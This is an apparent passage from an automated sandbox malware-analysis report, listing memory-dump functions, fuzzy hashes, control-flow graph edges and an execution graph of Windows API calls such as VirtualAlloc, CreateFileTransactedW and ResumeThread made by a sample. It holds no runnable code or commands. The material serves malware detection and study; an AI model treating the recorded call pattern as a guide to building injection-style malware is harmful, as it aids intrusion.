                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9e4aa8d023c554521d69145c88c55dda53890091300ef4485eeb38edc80a5ef
                                                  • Instruction ID: be238f3d933d4920361070eb031dc33be746971a532d56d335047deeeaebecfe
                                                  • Opcode Fuzzy Hash: d9e4aa8d023c554521d69145c88c55dda53890091300ef4485eeb38edc80a5ef
                                                  • Instruction Fuzzy Hash: A5B09210E5E203C7B12002A014500BC00428B06604A108B30D51F4A2C3FC4CA81821D0

                                                  Non-executed Functions

                                                  Function 00007FFAAC6E04BB Relevance: 6.7, Strings: 5, Instructions: 464COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0_^$0_^$<0_^$>0_^$?0_^
                                                  • API String ID: 0-1092052441
                                                  • Opcode ID: a03bb75d79f0be832947058e248656d44dc5aebb5c1d2b89904d11c592ea66d6
                                                  • Instruction ID: 2a44601a7219b289676699e3b5163d8e9061ba48579fb9d635fbc4ab4b0513e4
                                                  • Opcode Fuzzy Hash: a03bb75d79f0be832947058e248656d44dc5aebb5c1d2b89904d11c592ea66d6
                                                  • Instruction Fuzzy Hash: 1DE1899394E69257F203B778E8764EA3FD09F0312871C91B7E05E8E2A3ED0C645DC695
                                                  Function 00007FFAAC5809A1 Relevance: 3.6, Strings: 2, Instructions: 1120COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4F_I$4F_^
                                                  • API String ID: 0-151234248
                                                  • Opcode ID: b1e29fc52bd4711ba6aab15aca0e1405fa74c626b34a255bba0188129509d3f6
                                                  • Instruction ID: c76250b8a8fd0dbcfb26550816ae66f6baabca8f378e17e27491eca97b1a3e23
                                                  • Opcode Fuzzy Hash: b1e29fc52bd4711ba6aab15aca0e1405fa74c626b34a255bba0188129509d3f6
                                                  • Instruction Fuzzy Hash: BB72D953A4E7D28FF312A77CA8651F97FD4DF42225B0881F7D0CE8A197E808954A83D5
                                                  Function 00007FFAAC51C6ED Relevance: .2, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06b5e7a91fba735c50c09b2a66b5f29b1917975452795c8fbb6430e0f2b93041
                                                  • Instruction ID: d3cb05fbc6ae22690656e3ac6bf7a5d8fa31bf047972b3fcb5f038818fd5b305
                                                  • Opcode Fuzzy Hash: 06b5e7a91fba735c50c09b2a66b5f29b1917975452795c8fbb6430e0f2b93041
                                                  • Instruction Fuzzy Hash: A881A670508A8D8FEBA8EF18C8457E977E1FF5A310F10812AE84EC7291DB75A945CB81
                                                  Function 00007FFAAC6E87FA Relevance: 5.2, Strings: 4, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /_^$/_^$/_^$/_^
                                                  • API String ID: 0-3862072436
                                                  • Opcode ID: 59304bf58c69516132501917fcdbdab05132e2a3983c902e6ce1ef3ec95783cb
                                                  • Instruction ID: 9e3c92915b2304aa1c611c257860a8b196b15e1e2018a762b2518a7fcb5d8cd6
                                                  • Opcode Fuzzy Hash: 59304bf58c69516132501917fcdbdab05132e2a3983c902e6ce1ef3ec95783cb
                                                  • Instruction Fuzzy Hash: 6D61E0D3D0E2929BF212A77CD8A64EA3FD09F1321870C91B7E05E8E2A3ED1C6549C195

                                                  Execution Graph

                                                  Execution Coverage:12.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:32
                                                  Total number of Limit Nodes:2
                                                  execution_graph 23836 7ffaac4fa397 23837 7ffaac4fa39c 23836->23837 23840 7ffaac4f9fb0 23837->23840 23839 7ffaac4fa400 23841 7ffaac4f9fb9 CreateFileTransactedW 23840->23841 23843 7ffaac4fbba8 23841->23843 23843->23839 23811 7ffaac4fbc35 23812 7ffaac4fbc5f WriteFile 23811->23812 23814 7ffaac4fbdcf 23812->23814 23815 7ffaac4fda35 23816 7ffaac4fda5f VirtualAlloc 23815->23816 23818 7ffaac4fdb7f 23816->23818 23844 7ffaac4fd154 23845 7ffaac4fd15a 23844->23845 23848 7ffaac4fd59a 23845->23848 23847 7ffaac4fd160 23849 7ffaac4fd5a5 23848->23849 23850 7ffaac4fd5ed GetSystemInfo 23848->23850 23849->23847 23852 7ffaac4fd6c5 23850->23852 23852->23847 23819 7ffaac4fd5d1 23820 7ffaac4fd5ed GetSystemInfo 23819->23820 23822 7ffaac4fd6c5 23820->23822 23823 7ffaac4f9ebd 23824 7ffaac55ff20 23823->23824 23827 7ffaac55f110 23824->23827 23826 7ffaac560009 23829 7ffaac55f11b 23827->23829 23828 7ffaac55f1be 23828->23826 23829->23828 23831 7ffaac55f1d7 23829->23831 23832 7ffaac55f22a ResumeThread 23831->23832 23833 7ffaac55f1e2 23831->23833 23835 7ffaac55f2f4 23832->23835 23833->23828 23835->23828

                                                  Executed Functions

                                                  Function 00007FFAACA8B74F Relevance: 5.7, Strings: 4, Instructions: 739COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1011 7ffaaca8b74f-7ffaaca8b762 1012 7ffaaca8b764-7ffaaca8baa5 1011->1012 1013 7ffaaca8b7ae-7ffaaca8b7c4 1011->1013 1019 7ffaaca8baaf-7ffaaca8baee 1012->1019 1015 7ffaaca8b854-7ffaaca8b884 1013->1015 1016 7ffaaca8b7ca-7ffaaca8b7d2 1013->1016 1025 7ffaaca8b88a-7ffaaca8b88b 1015->1025 1026 7ffaaca8b92e-7ffaaca8b937 1015->1026 1018 7ffaaca8b7d8-7ffaaca8b7ea 1016->1018 1016->1019 1018->1019 1020 7ffaaca8b7f0-7ffaaca8b807 1018->1020 1030 7ffaaca8baf0 1019->1030 1022 7ffaaca8b847-7ffaaca8b84e 1020->1022 1023 7ffaaca8b809-7ffaaca8b810 1020->1023 1022->1015 1022->1016 1023->1019 1027 7ffaaca8b816-7ffaaca8b844 1023->1027 1029 7ffaaca8b88e-7ffaaca8b8a4 1025->1029 1031 7ffaaca8b93d-7ffaaca8b943 1026->1031 1032 7ffaaca8ba6f-7ffaaca8ba95 1026->1032 1027->1022 1029->1019 1033 7ffaaca8b8aa-7ffaaca8b8ce 1029->1033 1038 7ffaaca8bafb-7ffaaca8bb91 1030->1038 1031->1019 1035 7ffaaca8b949-7ffaaca8b958 1031->1035 1036 7ffaaca8b8d0-7ffaaca8b8f3 call 7ffaaca87710 1033->1036 1037 7ffaaca8b921-7ffaaca8b928 1033->1037 1039 7ffaaca8ba62-7ffaaca8ba69 1035->1039 1040 7ffaaca8b95e-7ffaaca8b965 1035->1040 1036->1019 1050 7ffaaca8b8f9-7ffaaca8b91f 1036->1050 1037->1026 1037->1029 1048 7ffaaca8bb16-7ffaaca8bb96 1038->1048 1049 7ffaaca8bb9c-7ffaaca8bbdf 1038->1049 1039->1031 1039->1032 1040->1019 1043 7ffaaca8b96b-7ffaaca8b977 call 7ffaaca87710 1040->1043 1047 7ffaaca8b97c-7ffaaca8b987 1043->1047 1051 7ffaaca8b9c6-7ffaaca8b9d5 1047->1051 1052 7ffaaca8b989-7ffaaca8b9a0 1047->1052 1048->1049 1060 7ffaaca8bb38-7ffaaca8bb98 1048->1060 1068 7ffaaca8bbe1-7ffaaca8bc36 1049->1068 1050->1036 1050->1037 1051->1019 1056 7ffaaca8b9db-7ffaaca8b9ff 1051->1056 1052->1019 1055 7ffaaca8b9a6-7ffaaca8b9c2 1052->1055 1055->1052 1058 7ffaaca8b9c4 1055->1058 1059 7ffaaca8ba02-7ffaaca8ba1f 1056->1059 1062 7ffaaca8ba42-7ffaaca8ba58 1058->1062 1059->1019 1063 7ffaaca8ba25-7ffaaca8ba40 1059->1063 1060->1049 1070 7ffaaca8bb5c-7ffaaca8bb9a 1060->1070 1062->1019 1067 7ffaaca8ba5a-7ffaaca8ba5e 1062->1067 1063->1059 1063->1062 1067->1039 1077 7ffaaca8bc41-7ffaaca8bce7 1068->1077 1070->1049 1075 7ffaaca8bb7d-7ffaaca8bb90 1070->1075 1089 7ffaaca8be17-7ffaaca8be34 1077->1089 1090 7ffaaca8bced-7ffaaca8c090 1077->1090 1091 7ffaaca8be3a-7ffaaca8be3f 1089->1091 1092 7ffaaca8c141-7ffaaca8c159 1089->1092 1094 7ffaaca8be42-7ffaaca8be49 1091->1094 1098 7ffaaca8c15b-7ffaaca8c318 1092->1098 1099 7ffaaca8c10d-7ffaaca8c118 1092->1099 1096 7ffaaca8be4b-7ffaaca8be4f 1094->1096 1097 7ffaaca8bdcc-7ffaaca8c139 1094->1097 1096->1068 1101 7ffaaca8be55 1096->1101 1097->1092 1103 7ffaaca8bed3-7ffaaca8bed6 1101->1103 1105 7ffaaca8bed9-7ffaaca8bee0 1103->1105 1107 7ffaaca8bee6 1105->1107 1108 7ffaaca8be57-7ffaaca8be8c call 7ffaaca8bae0 1105->1108 1110 7ffaaca8bf56-7ffaaca8bf5d 1107->1110 1108->1092 1115 7ffaaca8be92-7ffaaca8bea2 1108->1115 1112 7ffaaca8bee8-7ffaaca8bf1a call 7ffaaca8bae0 1110->1112 1113 7ffaaca8bf5f-7ffaaca8bfa5 1110->1113 1112->1092 1120 7ffaaca8bf20-7ffaaca8bf48 1112->1120 1127 7ffaaca8bd74-7ffaaca8bd78 1113->1127 1128 7ffaaca8bfab-7ffaaca8bfb0 1113->1128 1115->1068 1118 7ffaaca8bea8-7ffaaca8bec5 1115->1118 1118->1092 1121 7ffaaca8becb-7ffaaca8bed0 1118->1121 1120->1092 1122 7ffaaca8bf4e-7ffaaca8bf53 1120->1122 1121->1103 1122->1110 1129 7ffaaca8bdca 1127->1129 1130 7ffaaca8bd7a-7ffaaca8c10c 1127->1130 1131 7ffaaca8c036-7ffaaca8c03a 1128->1131 1129->1094 1130->1099 1133 7ffaaca8bfb5-7ffaaca8bfe4 call 7ffaaca8bae0 1131->1133 1134 7ffaaca8c040-7ffaaca8c046 1131->1134 1133->1092 1137 7ffaaca8bfea-7ffaaca8bffa 1133->1137 1137->1077 1138 7ffaaca8c000-7ffaaca8c00f 1137->1138 1138->1092 1139 7ffaaca8c015-7ffaaca8c028 1138->1139 1139->1105 1140 7ffaaca8c02e-7ffaaca8c033 1139->1140 1140->1131
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6$r6
                                                  • API String ID: 0-596633268
                                                  • Opcode ID: fc3793607657befdb6663809763fae76390ccf8f35d3306a7b9c39db4cf172a4
                                                  • Instruction ID: d9f70cd302e3f2b00be9ce13afdb1f2fef14b66109a8b519251389ecf07a2117
                                                  • Opcode Fuzzy Hash: fc3793607657befdb6663809763fae76390ccf8f35d3306a7b9c39db4cf172a4
                                                  • Instruction Fuzzy Hash: AF52D271929649CFEB5CCF18E4956B977A2FF4A300F5081BDD44EC7286EA38E945CB80
                                                  Function 00007FFAAC6C6CA9 Relevance: 3.2, Strings: 2, Instructions: 690COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1577 7ffaac6c6ca9-7ffaac6c6cba 1578 7ffaac6c6c68-7ffaac6c6c98 1577->1578 1579 7ffaac6c6cbc-7ffaac6c6ce4 1577->1579 1584 7ffaac6c6c9f-7ffaac6c6ca4 1578->1584 1582 7ffaac6c6cea-7ffaac6c6cef 1579->1582 1583 7ffaac6c7001-7ffaac6c700b 1579->1583 1585 7ffaac6c6cfb-7ffaac6c6d14 1582->1585 1586 7ffaac6c6cf1-7ffaac6c6cf4 1582->1586 1590 7ffaac6c700c-7ffaac6c703a 1583->1590 1588 7ffaac6c6d28-7ffaac6c6d55 1585->1588 1589 7ffaac6c6d16-7ffaac6c6d26 1585->1589 1586->1585 1588->1590 1594 7ffaac6c6d5b-7ffaac6c6d66 1588->1594 1589->1588 1595 7ffaac6c6fe8 1590->1595 1596 7ffaac6c703c-7ffaac6c707e 1590->1596 1597 7ffaac6c6e24-7ffaac6c6e29 1594->1597 1598 7ffaac6c6d6c-7ffaac6c6d7a 1594->1598 1603 7ffaac6c6fef-7ffaac6c7000 1595->1603 1625 7ffaac6c709b-7ffaac6c70ac 1596->1625 1626 7ffaac6c7080-7ffaac6c7086 1596->1626 1601 7ffaac6c6ebd-7ffaac6c6ec7 1597->1601 1602 7ffaac6c6e2f-7ffaac6c6e39 1597->1602 1598->1590 1599 7ffaac6c6d80-7ffaac6c6d91 1598->1599 1604 7ffaac6c6d93-7ffaac6c6db6 1599->1604 1605 7ffaac6c6df9-7ffaac6c6e10 1599->1605 1607 7ffaac6c6ee9-7ffaac6c6ef0 1601->1607 1608 7ffaac6c6ec9-7ffaac6c6ed4 1601->1608 1602->1590 1606 7ffaac6c6e3f-7ffaac6c6e53 1602->1606 1609 7ffaac6c6e58-7ffaac6c6e5d 1604->1609 1610 7ffaac6c6dbc-7ffaac6c6dcf 1604->1610 1605->1590 1612 7ffaac6c6e16-7ffaac6c6e1e 1605->1612 1611 7ffaac6c6ef3-7ffaac6c6efd 1606->1611 1607->1611 1620 7ffaac6c6edb-7ffaac6c6ee7 1608->1620 1617 7ffaac6c6dd3-7ffaac6c6df7 1609->1617 1610->1617 1611->1590 1615 7ffaac6c6f03-7ffaac6c6f1b 1611->1615 1612->1597 1612->1598 1615->1590 1619 7ffaac6c6f21-7ffaac6c6f39 1615->1619 1617->1605 1624 7ffaac6c6e62-7ffaac6c6e65 1617->1624 1619->1590 1621 7ffaac6c6f3f-7ffaac6c6f73 1619->1621 1620->1607 1621->1590 1653 7ffaac6c6f79-7ffaac6c6f8c 1621->1653 1630 7ffaac6c6e67-7ffaac6c6e77 1624->1630 1631 7ffaac6c6e7b-7ffaac6c6e88 1624->1631 1627 7ffaac6c70bd-7ffaac6c70df 1625->1627 1628 7ffaac6c70ae-7ffaac6c70b9 1625->1628 1632 7ffaac6c7088-7ffaac6c7099 1626->1632 1633 7ffaac6c70e1-7ffaac6c711d 1626->1633 1645 7ffaac6c70e0 1627->1645 1628->1627 1630->1631 1631->1590 1635 7ffaac6c6e8e-7ffaac6c6ebc 1631->1635 1632->1625 1632->1626 1649 7ffaac6c711f-7ffaac6c7132 1633->1649 1650 7ffaac6c711e 1633->1650 1649->1645 1659 7ffaac6c7134-7ffaac6c7137 1649->1659 1650->1649 1653->1603 1656 7ffaac6c6f8e-7ffaac6c6f99 1653->1656 1656->1603 1660 7ffaac6c6f9b-7ffaac6c6fb2 1656->1660 1662 7ffaac6c7138-7ffaac6c7149 1659->1662 1664 7ffaac6c6fb4-7ffaac6c6fc2 1660->1664 1665 7ffaac6c6fc3-7ffaac6c6fe5 1660->1665 1662->1650 1670 7ffaac6c714b-7ffaac6c7156 1662->1670 1664->1665 1665->1595 1673 7ffaac6c7158-7ffaac6c7189 1670->1673 1673->1662 1677 7ffaac6c718c-7ffaac6c718f 1673->1677 1679 7ffaac6c7190-7ffaac6c71a3 1677->1679 1682 7ffaac6c71a5-7ffaac6c71a8 1679->1682 1683 7ffaac6c71e2 1682->1683 1684 7ffaac6c71aa 1682->1684 1683->1679 1685 7ffaac6c71e4-7ffaac6c7202 1683->1685 1684->1673 1686 7ffaac6c71ac-7ffaac6c71af 1684->1686 1689 7ffaac6c71b0-7ffaac6c71bf 1685->1689 1692 7ffaac6c7204-7ffaac6c7211 1685->1692 1686->1689 1695 7ffaac6c71c0-7ffaac6c71d1 1689->1695 1692->1695 1696 7ffaac6c7214 1692->1696 1695->1682 1697 7ffaac6c7215-7ffaac6c7241 1696->1697 1705 7ffaac6c7243-7ffaac6c7258 1697->1705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$d
                                                  • API String ID: 0-2243634771
                                                  • Opcode ID: 66128f1d735d91a327555b1d197d2a11ce0466a02e11ddeae94858505233825d
                                                  • Instruction ID: c6e3b4708207948796446998851dd3c6ce9ee58b567b83267b12fa265eb91504
                                                  • Opcode Fuzzy Hash: 66128f1d735d91a327555b1d197d2a11ce0466a02e11ddeae94858505233825d
                                                  • Instruction Fuzzy Hash: 88220271A0D786CFF74BDB28C4915B57BE0EF56310B1891BAD44ECB293D928E80A87C1
                                                  Function 00007FFAAC6D0DE9 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p]
                                                  • API String ID: 0-315238154
                                                  • Opcode ID: e3fc5cdfd240aaa60e8d10a52734baf46c60ecaf0181d94fba188868304418a7
                                                  • Instruction ID: f3ab15d3ee6a644c0854d0a29709dbd501df0b60f921de5d16dcc752c45b9477
                                                  • Opcode Fuzzy Hash: e3fc5cdfd240aaa60e8d10a52734baf46c60ecaf0181d94fba188868304418a7
                                                  • Instruction Fuzzy Hash: 42D1383090DD89CFF76AEB1884557B437D1FF9A320B14A2BAD44EC7592DD28E80A87C1
                                                  Function 00007FFAAC6C9EFC Relevance: .3, Instructions: 297COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 734d16cd1f275cfb72008e4759137f2726979ccd93cff31665cee067037593c4
                                                  • Instruction ID: 312da8531bd5b7b1d67d9862b27c6cf164095a67d1461188ab3d028fcd2221fd
                                                  • Opcode Fuzzy Hash: 734d16cd1f275cfb72008e4759137f2726979ccd93cff31665cee067037593c4
                                                  • Instruction Fuzzy Hash: 24A10B72D0D686CFF747EB78D4A64E93BA0FF02318B049176D05ECA293ED29A50687D1
                                                  Function 00007FFAAC6CCDB2 Relevance: 4.1, Strings: 3, Instructions: 330COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1253 7ffaac6ccdb2-7ffaac6ccdb9 1254 7ffaac6ccfd5-7ffaac6ccfe6 1253->1254 1255 7ffaac6ccdbf-7ffaac6ccdf1 call 7ffaac6ccb50 call 7ffaac6cca20 1253->1255 1259 7ffaac6ccfe8 1254->1259 1260 7ffaac6ccfed-7ffaac6ccff8 1254->1260 1255->1254 1263 7ffaac6ccdf7-7ffaac6cce49 call 7ffaac6ccb50 call 7ffaac6cca20 1255->1263 1259->1260 1263->1254 1271 7ffaac6cce4f-7ffaac6cce94 call 7ffaac6ccb50 1263->1271 1277 7ffaac6cce96-7ffaac6cceaa call 7ffaac6cca20 1271->1277 1278 7ffaac6ccf04-7ffaac6ccf40 call 7ffaac6c9580 1271->1278 1277->1254 1284 7ffaac6cceb0-7ffaac6cced3 call 7ffaac6ccb50 1277->1284 1288 7ffaac6ccf79-7ffaac6ccf80 call 7ffaac6c93b0 1278->1288 1289 7ffaac6cced9-7ffaac6ccee9 1284->1289 1290 7ffaac6cd0a5-7ffaac6cd0bc 1284->1290 1293 7ffaac6ccf85-7ffaac6ccf8a 1288->1293 1289->1290 1292 7ffaac6cceef-7ffaac6ccf02 1289->1292 1297 7ffaac6cd0be 1290->1297 1298 7ffaac6cd0bf-7ffaac6cd0cd 1290->1298 1292->1277 1292->1278 1295 7ffaac6ccf42-7ffaac6ccf62 1293->1295 1296 7ffaac6ccf8c-7ffaac6ccf8e 1293->1296 1295->1290 1299 7ffaac6ccf68-7ffaac6ccf73 1295->1299 1296->1254 1300 7ffaac6ccf90-7ffaac6ccf93 1296->1300 1297->1298 1301 7ffaac6cd0d5 1298->1301 1302 7ffaac6cd0cf 1298->1302 1299->1288 1303 7ffaac6cd05b-7ffaac6cd06f 1299->1303 1304 7ffaac6ccf99-7ffaac6ccfb4 1300->1304 1305 7ffaac6ccf95 1300->1305 1306 7ffaac6cd0d7 1301->1306 1307 7ffaac6cd0d9-7ffaac6cd0ea 1301->1307 1302->1301 1314 7ffaac6cd076-7ffaac6cd081 1303->1314 1315 7ffaac6cd071 1303->1315 1304->1290 1312 7ffaac6ccfba-7ffaac6ccfd3 call 7ffaac6cca20 1304->1312 1305->1304 1306->1307 1309 7ffaac6cd119 1306->1309 1310 7ffaac6cd098-7ffaac6cd09c 1307->1310 1311 7ffaac6cd0ec-7ffaac6cd118 1307->1311 1317 7ffaac6cd11a-7ffaac6cd35a 1309->1317 1310->1290 1311->1309 1311->1317 1312->1254 1319 7ffaac6ccff9-7ffaac6cd012 call 7ffaac6ccb50 1312->1319 1315->1314 1319->1290 1324 7ffaac6cd018-7ffaac6cd01f 1319->1324 1325 7ffaac6cd049-7ffaac6cd051 1324->1325 1326 7ffaac6cd053-7ffaac6cd059 1325->1326 1327 7ffaac6cd021-7ffaac6cd03d 1325->1327 1326->1303 1329 7ffaac6cd082 1326->1329 1327->1290 1328 7ffaac6cd03f-7ffaac6cd047 1327->1328 1328->1325 1329->1310
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: 7f1a929f5713f6d86b52c5182e4474c543a16179fa6b83868054409dfc212678
                                                  • Instruction ID: db42e25d008718d752f31e74bc88699c0bef7ef197675d54de49f327bf1d6bb0
                                                  • Opcode Fuzzy Hash: 7f1a929f5713f6d86b52c5182e4474c543a16179fa6b83868054409dfc212678
                                                  • Instruction Fuzzy Hash: 63C1A37061DA469FF74BDF28C0946A4B7A1FF56300F54A179C04EC7A86CB28F85687C1
                                                  Function 00007FFAACA8B002 Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1330 7ffaaca8b002-7ffaaca8b009 1331 7ffaaca8b225-7ffaaca8b236 1330->1331 1332 7ffaaca8b00f-7ffaaca8b041 call 7ffaaca8ada0 call 7ffaaca8ac70 1330->1332 1336 7ffaaca8b238 1331->1336 1337 7ffaaca8b23d-7ffaaca8b248 1331->1337 1332->1331 1340 7ffaaca8b047-7ffaaca8b063 call 7ffaaca8ada0 1332->1340 1336->1337 1343 7ffaaca8b065 1340->1343 1344 7ffaaca8b068-7ffaaca8b06e 1343->1344 1345 7ffaaca8b071-7ffaaca8b099 call 7ffaaca8ac70 1343->1345 1344->1343 1348 7ffaaca8b070 1344->1348 1345->1331 1351 7ffaaca8b09f-7ffaaca8b0e4 call 7ffaaca8ada0 1345->1351 1348->1345 1357 7ffaaca8b154-7ffaaca8b190 call 7ffaaca878b0 1351->1357 1358 7ffaaca8b0e6-7ffaaca8b0fa call 7ffaaca8ac70 1351->1358 1370 7ffaaca8b1c9-7ffaaca8b1d0 call 7ffaaca87650 1357->1370 1358->1331 1364 7ffaaca8b100-7ffaaca8b123 call 7ffaaca8ada0 1358->1364 1368 7ffaaca8b2f5-7ffaaca8b30c 1364->1368 1369 7ffaaca8b129-7ffaaca8b139 1364->1369 1375 7ffaaca8b30e 1368->1375 1376 7ffaaca8b30f-7ffaaca8b31d 1368->1376 1369->1368 1371 7ffaaca8b13f-7ffaaca8b152 1369->1371 1374 7ffaaca8b1d5-7ffaaca8b1da 1370->1374 1371->1357 1371->1358 1377 7ffaaca8b192-7ffaaca8b1b2 1374->1377 1378 7ffaaca8b1dc-7ffaaca8b1de 1374->1378 1375->1376 1380 7ffaaca8b325 1376->1380 1381 7ffaaca8b31f 1376->1381 1377->1368 1379 7ffaaca8b1b8-7ffaaca8b1c3 1377->1379 1378->1331 1382 7ffaaca8b1e0-7ffaaca8b1e3 1378->1382 1379->1370 1387 7ffaaca8b2ab-7ffaaca8b2bf 1379->1387 1383 7ffaaca8b327 1380->1383 1384 7ffaaca8b329-7ffaaca8b368 1380->1384 1381->1380 1385 7ffaaca8b1e5 1382->1385 1386 7ffaaca8b1e9-7ffaaca8b204 1382->1386 1383->1384 1388 7ffaaca8b369 1383->1388 1384->1388 1392 7ffaaca8b36a-7ffaaca8b5aa 1384->1392 1385->1386 1386->1368 1390 7ffaaca8b20a-7ffaaca8b223 call 7ffaaca8ac70 1386->1390 1394 7ffaaca8b2c6-7ffaaca8b2d1 1387->1394 1395 7ffaaca8b2c1 1387->1395 1388->1392 1390->1331 1397 7ffaaca8b249-7ffaaca8b262 call 7ffaaca8ada0 1390->1397 1395->1394 1397->1368 1402 7ffaaca8b268-7ffaaca8b26f 1397->1402 1403 7ffaaca8b299-7ffaaca8b2a1 1402->1403 1404 7ffaaca8b2a3-7ffaaca8b2a9 1403->1404 1405 7ffaaca8b271-7ffaaca8b28d 1403->1405 1404->1387 1406 7ffaaca8b2d2 1404->1406 1405->1368 1407 7ffaaca8b28f-7ffaaca8b297 1405->1407 1406->1368 1407->1403
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: d304407f3670e6f18bedcbe453ebe32088229cfec926633afd9845a7f14c55ac
                                                  • Instruction ID: 6b761fd7924db3b6bb1c8498e61e994e1e70efee791f35e737bd5d35eb69410e
                                                  • Opcode Fuzzy Hash: d304407f3670e6f18bedcbe453ebe32088229cfec926633afd9845a7f14c55ac
                                                  • Instruction Fuzzy Hash: 82C1F371929A46CFF749DB18E4906B4B7A2FF4A300F548179C04EC7A86EB28F955CBC0
                                                  Function 00007FFAACA8BAE0 Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
